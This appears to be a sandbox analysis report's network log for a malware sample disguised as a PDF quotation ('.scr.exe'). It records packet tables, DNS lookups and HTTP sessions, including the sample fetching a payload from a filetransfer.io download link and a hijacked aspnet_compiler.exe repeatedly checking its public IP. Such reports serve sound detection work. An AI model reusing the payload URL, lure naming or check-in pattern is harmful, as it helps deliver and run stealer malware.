Oct 28, 2024 13:48:05.324776888 CET	49789	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:05.329874992 CET	80	49773	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:05.329972982 CET	49773	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:05.330209017 CET	80	49789	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:05.330323935 CET	49789	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:05.330442905 CET	49789	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:05.335777998 CET	80	49789	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:05.999342918 CET	80	49789	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:06.000925064 CET	49795	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:06.000963926 CET	443	49795	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:06.001040936 CET	49795	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:06.001308918 CET	49795	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:06.001324892 CET	443	49795	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:06.039921999 CET	49789	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:06.620928049 CET	443	49795	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:06.624866962 CET	49795	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:06.624886036 CET	443	49795	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:06.785449982 CET	443	49795	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:06.785608053 CET	443	49795	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:06.785881996 CET	49795	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:06.786454916 CET	49795	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:06.790354013 CET	49789	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:06.791356087 CET	49801	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:06.796376944 CET	80	49789	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:06.796840906 CET	80	49801	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:06.796937943 CET	49789	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:06.796961069 CET	49801	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:06.797127008 CET	49801	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:06.802974939 CET	80	49801	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:07.437530994 CET	80	49801	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:07.438921928 CET	49807	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:07.438973904 CET	443	49807	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:07.439043999 CET	49807	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:07.439327002 CET	49807	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:07.439342022 CET	443	49807	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:07.492877007 CET	49801	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:08.056999922 CET	443	49807	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:08.058135986 CET	49807	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:08.058221102 CET	443	49807	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:08.202147961 CET	443	49807	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:08.202307940 CET	443	49807	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:08.202368975 CET	49807	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:08.202743053 CET	49807	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:08.209832907 CET	49812	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:08.215240955 CET	80	49812	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:08.215332031 CET	49812	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:08.215420961 CET	49812	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:08.220762014 CET	80	49812	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:08.869223118 CET	80	49812	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:08.870745897 CET	49814	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:08.870812893 CET	443	49814	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:08.870898008 CET	49814	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:08.871164083 CET	49814	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:08.871191978 CET	443	49814	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:08.914805889 CET	49812	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:09.483529091 CET	443	49814	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:09.485059023 CET	49814	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:09.485133886 CET	443	49814	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:09.636885881 CET	443	49814	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:09.637006998 CET	443	49814	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:09.637083054 CET	49814	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:09.637626886 CET	49814	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:09.641249895 CET	49812	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:09.642349958 CET	49820	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:09.646951914 CET	80	49812	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:09.647020102 CET	49812	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:09.647713900 CET	80	49820	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:09.647794962 CET	49820	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:09.648000956 CET	49820	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:09.653253078 CET	80	49820	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:10.279105902 CET	80	49820	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:10.280890942 CET	49826	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:10.280991077 CET	443	49826	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:10.281095982 CET	49826	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:10.281419039 CET	49826	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:10.281450987 CET	443	49826	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:10.321083069 CET	49820	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:10.912080050 CET	443	49826	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:10.913470984 CET	49826	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:10.913511992 CET	443	49826	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:11.056828022 CET	443	49826	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:11.057590008 CET	443	49826	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:11.057682991 CET	49826	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:11.057918072 CET	49826	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:11.061408997 CET	49820	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:11.062711954 CET	49832	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:11.067286015 CET	80	49820	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:11.067385912 CET	49820	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:11.068033934 CET	80	49832	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:11.068110943 CET	49832	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:11.068175077 CET	49832	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:11.073426008 CET	80	49832	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:11.721246958 CET	80	49832	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:11.722707987 CET	49835	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:11.722735882 CET	443	49835	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:11.722805023 CET	49835	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:11.723140001 CET	49835	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:11.723154068 CET	443	49835	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:11.774174929 CET	49832	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:12.337446928 CET	443	49835	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:12.338718891 CET	49835	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:12.338745117 CET	443	49835	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:12.488729954 CET	443	49835	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:12.488809109 CET	443	49835	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:12.488869905 CET	49835	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:12.489551067 CET	49835	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:12.494033098 CET	49832	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:12.495316982 CET	49839	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:12.499833107 CET	80	49832	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:12.499896049 CET	49832	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:12.500622988 CET	80	49839	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:12.500699997 CET	49839	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:12.500818014 CET	49839	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:12.506057978 CET	80	49839	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:13.138823986 CET	80	49839	158.101.44.242	192.168.2.4
Oct 28, 2024 13:48:13.140271902 CET	49845	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:13.140324116 CET	443	49845	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:13.140455961 CET	49845	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:13.140826941 CET	49845	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:13.140842915 CET	443	49845	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:13.180438995 CET	49839	80	192.168.2.4	158.101.44.242
Oct 28, 2024 13:48:13.776879072 CET	443	49845	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:13.778629065 CET	49845	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:13.778666019 CET	443	49845	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:13.927129984 CET	443	49845	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:13.927712917 CET	443	49845	188.114.96.3	192.168.2.4
Oct 28, 2024 13:48:13.930470943 CET	49845	443	192.168.2.4	188.114.96.3
Oct 28, 2024 13:48:13.930836916 CET	49845	443	192.168.2.4	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 13:47:00.818520069 CET	64680	53	192.168.2.4	1.1.1.1
Oct 28, 2024 13:47:00.827054977 CET	53	64680	1.1.1.1	192.168.2.4
Oct 28, 2024 13:47:03.635409117 CET	51162	53	192.168.2.4	1.1.1.1
Oct 28, 2024 13:47:03.645698071 CET	53	51162	1.1.1.1	192.168.2.4
Oct 28, 2024 13:48:02.642745018 CET	59684	53	192.168.2.4	1.1.1.1
Oct 28, 2024 13:48:02.650137901 CET	53	59684	1.1.1.1	192.168.2.4
Oct 28, 2024 13:48:03.531339884 CET	61805	53	192.168.2.4	1.1.1.1
Oct 28, 2024 13:48:03.539144039 CET	53	61805	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 13:47:00.818520069 CET	192.168.2.4	1.1.1.1	0x1e48	Standard query (0)	filetransfer.io	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:47:03.635409117 CET	192.168.2.4	1.1.1.1	0x1b29	Standard query (0)	s23.filetransfer.io	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:02.642745018 CET	192.168.2.4	1.1.1.1	0x2936	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:03.531339884 CET	192.168.2.4	1.1.1.1	0x2f1	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 13:47:00.827054977 CET	1.1.1.1	192.168.2.4	0x1e48	No error (0)	filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:47:00.827054977 CET	1.1.1.1	192.168.2.4	0x1e48	No error (0)	filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:47:03.645698071 CET	1.1.1.1	192.168.2.4	0x1b29	No error (0)	s23.filetransfer.io		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:47:03.645698071 CET	1.1.1.1	192.168.2.4	0x1b29	No error (0)	s23.filetransfer.io		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:02.650137901 CET	1.1.1.1	192.168.2.4	0x2936	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 28, 2024 13:48:02.650137901 CET	1.1.1.1	192.168.2.4	0x2936	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:02.650137901 CET	1.1.1.1	192.168.2.4	0x2936	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:02.650137901 CET	1.1.1.1	192.168.2.4	0x2936	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:02.650137901 CET	1.1.1.1	192.168.2.4	0x2936	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:02.650137901 CET	1.1.1.1	192.168.2.4	0x2936	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:03.539144039 CET	1.1.1.1	192.168.2.4	0x2f1	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 13:48:03.539144039 CET	1.1.1.1	192.168.2.4	0x2f1	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

filetransfer.io

s23.filetransfer.io

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.96.3	80	3244	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:47:00.864451885 CET	95	OUT	GET /data-package/jI82Ms6K/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
Oct 28, 2024 13:47:01.720910072 CET	1000	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 28 Oct 2024 12:47:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://filetransfer.io/data-package/jI82Ms6K/download cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZmeyPPKfBFgJAWW0j7snk%2BZeZbKNm%2FKj%2FQ238T%2BhGd10gkZ7fUeto2iNHdk0FuXDEoMDerf5Q1Fqfwas4lwY4r2Ym8h5j2tNkGUGAaOGFBAdm5PH5%2BK2ENPH%2BvmcqTO1IKw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9b08319b95eac1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1232&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49773	158.101.44.242	80	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:48:02.662909031 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 13:48:03.337872982 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:03 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cda512a7e95a677a8b09f2131f1289ec Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 13:48:03.344742060 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 13:48:03.503777981 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:03 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d34fa3b485e1fce825261916670a352b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
Oct 28, 2024 13:48:04.403263092 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 13:48:04.558504105 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:04 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 29897a9f201a7f5f377704ae4400431f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49789	158.101.44.242	80	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:48:05.330442905 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 13:48:05.999342918 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:05 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7fc4491543d57ac7795e108f53e496ca Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49801	158.101.44.242	80	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:48:06.797127008 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 28, 2024 13:48:07.437530994 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9e20f9834c0c580138f511a24cd12d8d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49812	158.101.44.242	80	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:48:08.215420961 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 13:48:08.869223118 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:08 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7cc4bada95b20f56c2a2aa4528488001 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49820	158.101.44.242	80	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:48:09.648000956 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 13:48:10.279105902 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e6766216f8c15c7417bbe7a605ad5384 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49832	158.101.44.242	80	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:48:11.068175077 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 13:48:11.721246958 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:11 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 421e22e6936ede41d0ccfc0a3091cd30 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49839	158.101.44.242	80	6012	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Oct 28, 2024 13:48:12.500818014 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 28, 2024 13:48:13.138823986 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 12:48:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c8edb54a858a0cdd2b1b3560bef0f106 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	188.114.96.3	443	3244	C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 12:47:02 UTC	95	OUT	GET /data-package/jI82Ms6K/download HTTP/1.1 Host: filetransfer.io Connection: Keep-Alive
